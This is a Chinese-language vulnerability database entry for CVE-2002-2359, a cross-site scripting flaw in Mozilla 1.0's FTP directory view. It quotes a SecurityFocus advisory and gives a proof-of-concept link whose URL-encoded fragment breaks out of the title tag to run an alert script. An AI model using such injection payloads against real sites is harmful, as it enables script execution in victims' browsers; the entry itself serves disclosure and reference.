Mozilla FTP View跨站脚本攻击漏洞

Mozilla FTP View跨站脚本攻击漏洞

漏洞ID 1106904 漏洞类型 跨站脚本
发布时间 2002-08-06 更新时间 2002-12-31
图片[1]-Mozilla FTP View跨站脚本攻击漏洞-安全小百科CVE编号 CVE-2002-2359
图片[2]-Mozilla FTP View跨站脚本攻击漏洞-安全小百科CNNVD-ID CNNVD-200212-275
漏洞平台 Unix CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/21682
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-275
|漏洞详情
Mozilla1.0版本FTP查看功能存在跨站脚本攻击(XSS)漏洞。远程攻击者借助ftpURL标题标签注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/5403/info

A cross-site scripting vulnerability in Mozilla has been reported. When viewing the contents of a FTP site as web content from a ftp:// URL, the directory name is included in the HTML representation. It is not adequately sanitized before this occurs. An attacker may embed javascript as this value between opening and closing "<title>" tags in a FTP URL.

<a href="ftp://[FTPserver]/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>

Example:
<a href="ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>
|参考资料

来源:BID
名称:5403
链接:http://www.securityfocus.com/bid/5403
来源:XF
名称:multiple-ftp-view-xss(9757)
链接:http://www.iss.net/security_center/static/9757.php
来源:bugzilla.mozilla.org
链接:http://bugzilla.mozilla.org/show_bug.cgi?id=154030
来源:VULNWATCH
名称:20020806MozillaFTPViewCross-SiteScriptingVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0060.html

相关推荐: Microsoft PhoneBook Server Buffer Overflow

Microsoft PhoneBook Server Buffer Overflow 漏洞ID 1103631 漏洞类型 Boundary Condition Error 发布时间 2000-12-04 更新时间 2000-12-04 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享